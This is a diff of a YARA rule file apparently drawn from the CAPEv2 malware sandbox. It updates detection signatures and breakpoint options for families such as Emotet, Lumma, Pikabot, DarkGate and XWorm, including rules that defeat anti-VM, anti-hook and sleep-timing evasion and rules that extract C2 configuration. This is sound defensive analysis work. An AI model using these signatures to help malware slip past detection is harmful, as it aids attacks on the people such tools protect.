-		$antivm3 = {0F 57 C0 E8 [4] 8B 35 [4] BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
-		$antivm4 = {F2 0F 11 45 EC FF 15 [4] 8B DA 8B C8 BA [4] 89 5D FC F7 E2 BF [4] 89 45 F4 8B F2 8B C1 B9}
-		$antivm5 = {BB 01 00 00 00 8B FB 90 FF 15 [4] FF C7 66 0F 6E C7 F3 0F E6 C0 66 0F 2F F8 73 EA}
-		$antivm6 = {48 81 EC 88 00 00 00 0F 57 C0 F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11}
-
-	condition:
-		any of them
-}
-rule CAPE_Doomedloader : FILE
-{
-	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly"
-		id = "88436e71-360e-5719-989f-24e71591ebe0"
-		date = "2024-04-12"
-		modified = "2024-07-25"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/DoomedLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "54a5962ef49ebf987908c4ea1559788f7c96a7e4ea61d2973636e998a0239c77"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "clear,bp0=$anti*-4,action0=setzeroflag,sysbp=$syscall+7,count=0,procdump=2"
-		packed = "914b1b3180e7ec1980d0bafe6fa36daade752bb26aec572399d2f59436eaa635"
-
-	strings:
-		$anti = {48 8B 4C 24 ?? E8 [4] 84 C0 B8 [4] 41 0F 45 C6 EB}
-		$syscall = {49 89 CA 8B 44 24 08 FF 64 24 10}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and all of them
-}
-rule CAPE_Emotetpacker : FILE
-{
-	meta:
-		description = "Emotet bypass"
-		author = "kevoreilly"
-		id = "67b8e14c-5fa8-52af-bb9a-1663b084fbf0"
-		date = "2022-03-31"
-		modified = "2022-06-09"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/EmotetPacker.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "5a95d1d87ce69881b58a0e3aafc1929861e2633cdd960021d7b23e2a36409e0d"
-		logic_hash = "5f27d9d18884f7e0805f69960869b332c1577bf8be8ac103285e8bf98cda0ffd"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$trap1+31,action0=skip,bp1=$trap2+43,action1=jmp:186,count=1"
+and licensed under the Apache License, Version 2.0.
 
-	strings:
-		$trap1 = {8B 45 08 0F 28 0D [4] 0F 57 C0 0F 29 46 30 89 46 40 C7 46 44 00 00 00 00 0F 11 4E 48 E8}
-		$trap2 = {F2 0F 10 15 [4] BE 01 00 00 00 0F 01 F9 C7 44 24 60 00 00 00 00 89 4C 24 60 0F 01 F9 C7 44 24 5C 00 00 00 00 89 4C 24 5C 0F 1F 84 00 00 00 00 00}
+The file analyzer/windows/modules/amsi.py uses parts of pywintrace
+(https://github.com/fireeye/pywintrace), which is copyrighted by FireEye, Inc. and licensed
+under the Apache License, Version 2.0.
 
-	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $trap* )
-}
-rule CAPE_Smokeinjector : FILE
+ */
+rule CAPE_Lumma : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
+		description = "Lumma config extraction"
 		author = "kevoreilly"
-		id = "955afcbe-45c9-5c9a-a76b-d89ae1b381bc"
-		date = "2023-02-06"
-		modified = "2025-11-19"
+		id = "b2166620-3070-5727-b189-e6959cc5b698"
+		date = "2024-01-05"
+		modified = "2024-05-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/SmokeLoader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "757a2bf8aceb92bee839bfcaba3b1a8bc4c037812b969e0f493e4f7a4ddc9ede"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Lumma.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "a8f9212b619796f91f14c4164e4d2f30c66b51118f22f3d6c310841b6707b7b0"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "monitor=explorer"
-		packed = "d38f9ab81a054203e5b5940e6d34f3c8766f4f4104b14840e4695df511feaa30"
+		cape_options = "bp0=$decode+5,action0=string:ebp,count=0,bp1=$patch+8,action1=skip,typestring=Lumma Config"
+		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
 
 	strings:
-		$dec1 = {80 04 08 [0-7] (49|83 E9 01) [0-7] 41 [0-7] 81 F1 [2] 00 00 [0-7] 01 D9 [0-7] FF E1}
+		$c2 = {8D 44 24 ?? 50 89 4C 24 ?? FF 31 E8 [4] 83 C4 08 B8 FF FF FF FF}
+		$decode = {C6 44 05 00 00 83 C4 2C 5E 5F 5B 5D C3}
+		$patch = {66 C7 0? 00 00 8B 46 1? C6 00 01 8B}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule CAPE_Slowloader
+rule CAPE_Lummaremap
 {
 	meta:
-		description = "SlowLoader detonation aide for slow cpus (thread race)"
+		description = "Lumma ntdll-remap bypass"
 		author = "kevoreilly"
-		id = "05724bf4-b767-542d-a2dd-a9ae3e5ea5cc"
-		date = "2024-09-23"
-		modified = "2024-09-23"
+		id = "93ae37d1-a38a-5f96-8bb3-cc648a49b588"
+		date = "2024-01-05"
+		modified = "2024-05-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/SlowLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "f07528c646ebd980a5e843caa4a4715e31b22c3cd091576600e9fe45d7fc2fe4"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Lumma.yar#L16-L27"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "51093379fbd041f75bdfe161bc9dfcc7d782c23ce16d625ca558bb58d8d57713"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "break-on-return=CreateProcessA,action0=sleep:1000,count=0"
-		packed = "f6eeb73ffb3e6d6cc48f74344cb590614db7e3116ba00a52aefd7dff468a60a5"
+		cape_options = "ntdll-remap=0"
+		packed = "7972cbf2c143cea3f90f4d8a9ed3d39ac13980adfdcf8ff766b574e2bbcef1b4"
 
 	strings:
-		$code = {0F B6 44 07 08 0F B6 54 1F 08 03 C2 25 FF 00 00 80 79 07 48 0D 00 FF FF FF 40 89 45 ?? 6A 00}
+		$remap = {C6 44 24 20 00 C7 44 24 1C C2 00 00 90 C7 44 24 18 00 00 FF D2 C7 44 24 14 00 BA 00 00 C7 44 24 10 B8 00 00 00 8B ?? 89 44 24 11}
 
 	condition:
 		any of them
 }
-rule CAPE_Anticuckoo : FILE
-{
-	meta:
-		description = "AntiCuckoo bypass: https://github.com/therealdreg/anticuckoo"
-		author = "kevoreilly"
-		id = "e221e57b-313e-5998-a3fc-5b4e9671b989"
-		date = "2023-03-17"
-		modified = "2023-03-17"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/AntiCuckoo.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "ad5e52f144bb4a1dae3090978c6ecb4c7732538c9b62a6cedd32eccee6094be5"
-		logic_hash = "a039aeca2dae44980e8bffafacfda90975e107001be50f11ac916b35ad43592e"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$HKActivOldStackCrash+36,action0=jmp,count=1"
-
-	strings:
-		$HKActivOldStackCrash = {5B 81 FB FA FA FA FA 74 01 41 3B E0 75 ?? 83 E9 0B 83 F9 04 7F 04 C6 45 ?? 00 89 4D ?? 89 65 ?? 80 7D ?? 00 74}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and all of them
-}
 rule CAPE_Rhadamanthys
 {
 	meta:
@@ -62174,8 +61728,8 @@ rule CAPE_Rhadamanthys
 		date = "2023-01-25"
 		modified = "2025-11-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Rhadamanthys.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Rhadamanthys.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "3c8fbfe14f81e099fc900023d9c856e3f45b99af38889ed952b2ac67a636f51d"
 		score = 75
 		quality = 70
@@ -62200,8 +61754,8 @@ rule CAPE_Rhadaanti
 		date = "2023-01-25"
 		modified = "2025-11-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Rhadamanthys.yar#L15-L24"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Rhadamanthys.yar#L15-L24"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "b54fd25e3297d358f2a8ec3a868bb4d233ee32d6942f21a53c3d25d35164530b"
 		score = 75
 		quality = 70
@@ -62223,8 +61777,8 @@ rule CAPE_Rhadunhook
 		date = "2023-01-25"
 		modified = "2025-11-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Rhadamanthys.yar#L26-L36"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Rhadamanthys.yar#L26-L36"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "f2da2f1ee6b0a3b9fe58b2c35ccf0a0f6dee44228ec92659370d30defdef7ea3"
 		score = 75
 		quality = 70
@@ -62239,254 +61793,336 @@ rule CAPE_Rhadunhook
 	condition:
 		any of them
 }
-rule CAPE_Pikahook : FILE
+rule CAPE_Singlestepantihook
 {
 	meta:
-		description = "Pikabot anti-hook bypass"
+		description = "Single-step anti-hook Bypass"
 		author = "kevoreilly"
-		id = "e1b7a807-135f-52d7-bc36-c0419e82b424"
-		date = "2024-03-07"
-		modified = "2024-03-12"
+		id = "f7aca40b-d231-543b-81f3-5f4524abab78"
+		date = "2021-08-26"
+		modified = "2021-08-26"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Pikabot.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "2a50a5f2d905122a5b7ac8ca3666b47caa24d325e246841129e53807daf2a1dd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/SingleStepAntiHook.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "fc9f36b0ecc13192fe8b6caaff256ac52c1f14480223d629a38ba84e90dd0809"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "clear,sysbp=$indirect+40,sysbpmode=1,force-sleepskip=1"
-		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
+		tags = ""
+		cape_options = "bp0=$antihook+6,action0=skip,count=0"
 
 	strings:
-		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1 [4] FF 15}
-		$sysenter1 = {89 44 24 08 8D 85 20 FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
-		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
+		$antihook = {FF D? 83 EC 08 9C 81 0C 24 00 01 00 00 9D}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		any of them
 }
-rule CAPE_Pikexport : FILE
+rule CAPE_Buerloader : FILE
 {
 	meta:
-		description = "Pikabot export selection"
+		description = "BuerLoader RDTSC Trap Bypass"
 		author = "kevoreilly"
-		id = "7d2432f2-90ae-5ad0-b579-5789a1c14a08"
-		date = "2024-03-07"
-		modified = "2024-03-12"
+		id = "38f01199-6bd2-5519-b570-8c0f46e74286"
+		date = "2021-03-13"
+		modified = "2021-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Pikabot.yar#L16-L28"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646"
-		logic_hash = "33f58703a0e40c2361343dbdcc17111aafbf5cc912393edda79005c6ec566f42"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/BuerLoader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6f9f9b4c01251c0643c61701084cca2bdfeea08ca95f982355565cf05483d940"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_options = "bp0=$trap+43,action0=skip,count=0"
 
 	strings:
-		$export = {55 8B EC 83 EC ?? C6 45 [2] C6 45 [2] C6 45 [2] C6 45 [2] C6 45}
-		$pe = {B8 08 00 00 00 6B C8 00 8B 55 ?? 8B 45 ?? 03 44 0A 78 89 45 ?? 8B 4D ?? 8B 51 18 89 55 E8 C7 45 F8 00 00 00 00}
+		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Risepro : FILE
+rule CAPE_Doomedloader : FILE
 {
 	meta:
 		description = "No description has been set in the source file - CAPE"
 		author = "kevoreilly"
-		id = "63d9cb19-0688-5632-8477-ce9b7e986a55"
-		date = "2023-12-16"
-		modified = "2023-12-16"
+		id = "88436e71-360e-5719-989f-24e71591ebe0"
+		date = "2024-04-12"
+		modified = "2024-07-25"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/RisePro.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "1b69a1dd5961241b926605f0a015fa17149c3b2759fb077a30a22d4ddcc273f6"
-		logic_hash = "055ca8328923b91f93c116e4a856366356fa11155f4e9fde95da31129b51386a"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/DoomedLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "54a5962ef49ebf987908c4ea1559788f7c96a7e4ea61d2973636e998a0239c77"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$c2+15,action0=string:edx,bp1=$c2+41,action1=string:ecx,count=1"
+		cape_options = "clear,bp0=$anti*-4,action0=setzeroflag,sysbp=$syscall+7,count=0,procdump=2"
+		packed = "914b1b3180e7ec1980d0bafe6fa36daade752bb26aec572399d2f59436eaa635"
 
 	strings:
-		$decode1 = {8A 06 46 84 C0 75 F9 2B F1 B8 FF FF FF 7F 8B 4D ?? 8B 51 ?? 2B C2 3B C6 72 38 83 79 ?? 10 72 02 8B 09 52 51 56 53 51 FF 75 ?? 8B CF E8}
-		$decode2 = {8B D9 81 FF FF FF FF 7F 0F [2] 00 00 00 C7 43 ?? 0F 00 00 00 83 FF 10 73 1A 57 FF 75 ?? 89 7B ?? 53 E8 [4] 83 C4 0C C6 04 1F 00 5F 5B 5D C2 08 00}
-		$c2 = {FF 75 30 83 3D [4] 10 BA [4] B9 [4] 0F 43 15 [4] 83 3D [4] 10 0F 43 0D [4] E8 [4] A3}
+		$anti = {48 8B 4C 24 ?? E8 [4] 84 C0 B8 [4] 41 0F 45 C6 EB}
+		$syscall = {49 89 CA 8B 44 24 08 FF 64 24 10}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Lumma : FILE
+rule CAPE_Mysterysnail
 {
 	meta:
-		description = "Lumma config extraction"
+		description = "MysterySnail anti-sandbox bypass"
 		author = "kevoreilly"
-		id = "b2166620-3070-5727-b189-e6959cc5b698"
-		date = "2024-01-05"
-		modified = "2024-05-09"
+		id = "dfeb820a-3101-5588-8348-3b62a6900538"
+		date = "2021-10-16"
+		modified = "2021-10-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Lumma.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "a8f9212b619796f91f14c4164e4d2f30c66b51118f22f3d6c310841b6707b7b0"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/MysterySnail.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "9402dbbbfdd286e2309ee83fc08194f70f73657a3a4e3785dfbcb564dbee86a8"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_options = "bp0=$anti+62,action0=skip,count=0"
+
+	strings:
+		$anti = {F2 0F 10 [3] 66 0F 2F 05 [4] 76 0A 8B [3] FF C0 89 [3] B9 5B 05 00 00 FF 15 [4] E8 [4] 89 [3] 8B [3] 8B [3] 2B C8 8B C1 3B [3] 7E 16}
+
+	condition:
+		any of them
+}
+rule CAPE_Darkgateloader
+{
+	meta:
+		description = "DarkGate Loader"
+		author = "enzok"
+		id = "feb90ae6-ec01-59da-a3df-217df2133588"
+		date = "2023-08-09"
+		modified = "2025-04-07"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/DarkGateLoader.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "00692123615d2f7eaf8aea07754fc9439cf58e1fb8eb4f44f0428b362f27e794"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_options = "bp0=$decrypt1+30,bp0=$decrypt2+29,action0=dump:eax::ebx,bp1=$decrypt3+80,action1=dumpsize:eax,bp2=$decrypt3+124,hc2=1,action2=dump:eax,count=0"
+		packed = "b15e4b4fcd9f0d23d902d91af9cc4e01417c426e55f6e0b4ad7256f72ac0231a"
+
+	strings:
+		$loader = "loader"
+		$decrypt1 = {B? 01 00 00 00 8B [3] E8 [4] 8B D7 32 54 [4] 88 54 18 FF 4? 4? 75}
+		$decrypt2 = {B? 01 00 00 00 8B [2] E8 [4] 8B D7 2B D3 [4] 88 54 18 FF 4? 4? 75}
+		$decrypt3 = {89 85 [4] 8B 85 [4] 8B F0 8D BD [4] B? 10 [3] F3 A5 8B 85 [4] 33 D2 [2] 8B 85 [4] 99}
+
+	condition:
+		$loader and any of ( $decrypt* )
+}
+rule CAPE_Latrodectus : FILE
+{
+	meta:
+		description = "Latrodectus export selection"
+		author = "kevoreilly"
+		id = "7c6f167a-6b76-5509-b164-306d1cd19b0f"
+		date = "2024-02-26"
+		modified = "2024-02-26"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Latrodectus.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05"
+		logic_hash = "c2c9f23e287253d766425c05eb774f6e07bdcbabc259e04b723a1a87c8b91fbd"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$decode+5,action0=string:ebp,count=0,bp1=$patch+8,action1=skip,typestring=Lumma Config"
-		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
+		cape_options = "export=$export"
 
 	strings:
-		$c2 = {8D 44 24 ?? 50 89 4C 24 ?? FF 31 E8 [4] 83 C4 08 B8 FF FF FF FF}
-		$decode = {C6 44 05 00 00 83 C4 2C 5E 5F 5B 5D C3}
-		$patch = {66 C7 0? 00 00 8B 46 1? C6 00 01 8B}
+		$export = {48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 EC 30 4C 8B 05 [4] 33 D2 C7 40 [5] 88 50 ?? 49 63 40 3C 42 8B 8C 00 88 00 00 00 85 C9 0F 84}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Lummaremap
+rule CAPE_Xworm
 {
 	meta:
-		description = "Lumma ntdll-remap bypass"
+		description = "XWorm Config Extractor"
 		author = "kevoreilly"
-		id = "93ae37d1-a38a-5f96-8bb3-cc648a49b588"
-		date = "2024-01-05"
-		modified = "2024-05-09"
+		id = "0f55dbfb-c239-53f2-a1e0-bfa494558d6e"
+		date = "2023-11-07"
+		modified = "2023-11-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Lumma.yar#L16-L27"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "51093379fbd041f75bdfe161bc9dfcc7d782c23ce16d625ca558bb58d8d57713"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/XWorm.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "d8e103f3470e83d71cd4992b74698c0721b8a69d764fdb7a4543997b2853014a"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "ntdll-remap=0"
-		packed = "7972cbf2c143cea3f90f4d8a9ed3d39ac13980adfdcf8ff766b574e2bbcef1b4"
+		cape_options = "bp0=$decrypt+11,action0=string:r10,count=1,typestring=XWorm Config"
 
 	strings:
-		$remap = {C6 44 24 20 00 C7 44 24 1C C2 00 00 90 C7 44 24 18 00 00 FF D2 C7 44 24 14 00 BA 00 00 C7 44 24 10 B8 00 00 00 8B ?? 89 44 24 11}
+		$decrypt = {45 33 C0 39 09 FF 15 [4] 48 8B F0 E8 [4] 48 8B C8 48 8B D6 48 8B 00 48 8B 40 68 FF 50 ?? 90}
 
 	condition:
 		any of them
 }
-rule CAPE_Rdtscpantivm
+rule CAPE_Blister : FILE
 {
 	meta:
-		description = "RdtscpAntiVM bypass"
+		description = "Blister Sleep Bypass"
 		author = "kevoreilly"
-		id = "11dc634b-1e2f-55b4-be60-98e51de42d43"
-		date = "2021-12-11"
-		modified = "2021-12-11"
+		id = "34657bab-f100-5ea8-9111-da2806f46b79"
+		date = "2022-05-10"
+		modified = "2024-05-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/RdtscpAntiVM.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "be0f9b52fb630730a38160f4ad2d50b6b4bea5edd82e3ea4d1e257cf7b090910"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Blister.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "aba379b93c85241cf250829832b2c8a5eaafb3abd0ff955dbaf0d06489c00deb"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "nop-rdtscp=1"
+		tags = "FILE"
+		cape_options = "bp0=$sleep1+6,bp1=$sleep2+7,action0=setsignflag,action1=clearcarryflag,count=3"
+		packed = "0a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00"
+		packed = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
 
 	strings:
-		$antivm = {46 0F 01 F9 [0-4] 66 0F 6E C6 F3 0F E6 C0 66 0F 2F ?? 73}
+		$sleep1 = {FF FF 83 7D F0 00 (E9|0F 8?)}
+		$sleep2 = {81 7D D8 90 B2 08 00 (E9|0F 8?)}
+		$protect = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
+		$lock = {56 33 F6 B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75 F7}
+		$comp = {6A 04 59 A1 [4] 8B 78 04 8B 75 08 33 C0 F3 A7 75 0B 8B 45 0C 83 20 00 33 C0 40 EB 02 33 C0}
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and 2 of ( $protect , $lock , $comp ) and all of ( $sleep* )
 }
-rule CAPE_Privateloader
+rule CAPE_Dridexloader : FILE
 {
 	meta:
-		description = "PrivateLoader indirect syscall capture"
+		description = "DridexLoader API Spam Bypass"
 		author = "kevoreilly"
-		id = "3a0b16da-ec84-5761-bcf2-106362c5667d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a8b62f64-87a0-58d3-8876-9b0f6a7deb97"
+		date = "2021-03-09"
+		modified = "2021-03-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/PrivateLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "204a86bb3743f19fed0fe55ff5ccd716661f7f315b5966a29e434ccb3e160526"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/DridexLoader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
